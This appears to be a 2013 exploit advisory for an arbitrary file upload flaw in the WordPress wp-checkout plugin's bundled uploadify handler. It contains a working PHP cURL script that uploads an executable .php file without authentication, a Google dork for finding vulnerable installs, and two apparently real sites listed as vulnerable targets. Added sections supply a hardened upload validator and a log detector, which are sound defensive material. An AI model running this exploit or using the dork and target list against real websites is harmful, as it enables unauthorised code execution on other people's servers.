
Wordpress Plugins wp-checkout Arbitrary File Upload Vulnerability

Author: Gastro-Dz , Published: 04-01-2013


############################################################################
# Author      : Gastro-Dz
# Date        : 02/01/2013
# Facebook    : http://fb.me/Gastr0
# Vendor      : http://wordpress.org/extend/plugins/wordpress-checkout/
# Google Dork : inurl:/wp-content/plugins/wp-checkout/vendors/uploadify
# Tested on   : Windows 7, Kubuntu 11.04
############################################################################

Exploit : uploadshell.php

The uploadify upload.php shipped with the plugin accepts a multipart POST with a "Filedata" file part and a "folder" field, and stores the file without checking the extension, so a .php file is written where the web server will execute it.

<?php

// Local PHP file to upload (the web shell / test payload).
$uploadfile = "Gastro.php";

// Unauthenticated upload handler bundled with the plugin.
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array(
                // "@file" is the legacy cURL file-upload syntax (PHP < 5.5);
                // on PHP 5.5+ use new CURLFile($uploadfile) instead.
                'Filedata' => "@$uploadfile",
                'folder'   => '/wp-content/plugins/wp-checkout/vendors/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The handler's response tells you where the file was stored.
print "$postResult";
?>
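The handler fails because the client controls both where the file goes ("folder") and what it is called (the .php extension survives, even if the base name is randomized). The following is an added illustration, not the plugin's code and not part of the original advisory: it models that vulnerable path computation next to a hardened version that ignores the client's directory, allowlists extensions, checks the leading bytes of the content, and writes under a random name in a fixed location. The document root, the image-only policy and the destination directory are assumptions for the example.

```python
"""Hardened handling for an uploadify-style upload.php (added example).

Illustration code, not the wp-checkout plugin's source. It models the two
things the advisory shows the endpoint trusting: the client-supplied 'folder'
parameter (where the file goes) and the client-supplied file name (which
decides whether the web server will execute the result). All paths and the
image-only policy are assumptions made for this example.
"""
import os
import secrets

# Assumed policy for a checkout widget: images only.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Leading bytes that must be present for each accepted type.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Fixed destination relative to the document root; the request has no say in it.
UPLOAD_SUBDIR = os.path.join("wp-content", "uploads", "wp-checkout")


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_target(document_root, folder, filename):
    """The pattern the advisory exploits: document root + client 'folder' +
    client file name, so 'Gastro.php' lands wherever the attacker says."""
    return os.path.join(document_root, folder.lstrip("/"), filename)


def hardened_target(document_root, filename, data):
    """Validate an upload and return the only path it may be written to.

    The client's directory choice is ignored, the extension is allowlisted,
    the content must match the claimed type, and the stored name is random,
    so nothing the client sends reaches the file system path.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed: %r" % ext)
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not look like %s" % ext)
    name = secrets.token_hex(16) + "." + ext
    return os.path.join(document_root, UPLOAD_SUBDIR, name)


def is_rejected(filename, data):
    """True if hardened_target refuses this upload (document root assumed)."""
    try:
        hardened_target("/var/www", filename, data)
    except UploadRejected:
        return True
    return False


def store_upload(document_root, filename, data):
    """Write a validated upload to disk and return its path."""
    dest = hardened_target(document_root, filename, data)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


if __name__ == "__main__":
    # Where the exploit's request would land under the vulnerable logic.
    print(vulnerable_target("/var/www",
                            "/wp-content/plugins/wp-checkout/vendors/uploadify/",
                            "Gastro.php"))
    # The same payload against the hardened logic is refused.
    print(is_rejected("Gastro.php", b"<?php phpinfo(); ?>"))
    # A genuine PNG is accepted and gets a random, non-executable name.
    print(hardened_target("/var/www", "photo.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))
```

Even with this validation in place, the web server should be configured so that nothing under wp-content/uploads is ever handed to the PHP interpreter; that second layer is what turns a future validation bug into a harmless file write rather than code execution.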


Shell Access : http://localhost/wordpress/wp-content/uploads/wp-checkout/uploadify/random_name.php
-------------------
Contents of the uploaded Gastro.php used for the test (the handler stores it under a random name but keeps the .php extension, so it runs when requested):

<?php
phpinfo();
?>
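From the defender's side, the chain above leaves two distinct marks in the web server's access log: a POST to the plugin's uploadify upload.php, followed by a request for a .php file under wp-content/uploads, a directory that should never serve PHP. The following detector is an added example, not part of the advisory; the log lines are constructed in Apache combined format for this illustration (addresses from documentation ranges, and 8f1a2c.php standing in for the random name shown above as random_name.php).

```python
"""Detecting the upload-then-execute chain in web-server logs (added example).

The log lines below are constructed for this illustration, not a real capture.
"""
import re
from collections import defaultdict

# Apache combined log format, up to the status code and size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The advisory's endpoint: uploadify's upload.php bundled inside a plugin.
UPLOADIFY_POST = re.compile(r'/wp-content/plugins/[^/]+/vendors/uploadify/upload\.php$')
# PHP should never be served from wp-content/uploads; any request for it is suspect.
PHP_UNDER_UPLOADS = re.compile(r'^/wp-content/uploads/.*\.php\d?$', re.I)

# Constructed sample: one attacker (203.0.113.5) running the full chain,
# one ordinary visitor (198.51.100.7) doing normal things.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2013:10:02:11 +0000] "GET /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jan/2013:10:02:14 +0000] "POST /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php HTTP/1.1" 200 61 "-" "-"
203.0.113.5 - - [04/Jan/2013:10:02:20 +0000] "GET /wp-content/uploads/wp-checkout/uploadify/8f1a2c.php HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jan/2013:10:05:00 +0000] "GET /wp-content/uploads/2013/01/logo.png HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jan/2013:10:05:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
"""


def analyze(log_text):
    """Return (ip, kind, path, status) for each line matching an indicator.

    kind is 'uploadify_post' for a POST to the upload handler and
    'php_in_uploads' for any request of a .php file below wp-content/uploads.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop any query string
        if m.group("method") == "POST" and UPLOADIFY_POST.search(path):
            alerts.append((m.group("ip"), "uploadify_post", path, m.group("status")))
        if PHP_UNDER_UPLOADS.search(path):
            alerts.append((m.group("ip"), "php_in_uploads", path, m.group("status")))
    return alerts


def attack_chains(alerts):
    """IPs that both posted to the upload handler and requested PHP from
    uploads: the complete chain the advisory describes, not just a scan."""
    kinds = defaultdict(set)
    for ip, kind, _path, _status in alerts:
        kinds[ip].add(kind)
    wanted = {"uploadify_post", "php_in_uploads"}
    return sorted(ip for ip, seen in kinds.items() if wanted <= seen)


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print("full chains from:", attack_chains(found))
```

A lone GET to upload.php (the Google dork traffic) is deliberately not alerted on; the POST is the action that matters, and the .php request under uploads is what confirms the upload succeeded and was executed.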

------------------------------

[#] Demo vulnerable sites :

http://207.67.52.103/wp-content/uploads/wp-checkout/uploadify/upload.php
http://www.amantofish.com/wp-content/uploads/wp-checkout/uploadify/upload.php

[#] Greetings
#############################################################################
# EvilDz - Hacker-1420 - Jago-dz - DamaneDz - Th3 killer Dz - HTC28DZ - Oxyl - Over-x - hacker-fire - foolox - the viper L3b r1'Z & Dz-root.com & Sec4ever.com
#############################################################################

------------------------------ The End ---------------------------------------------------
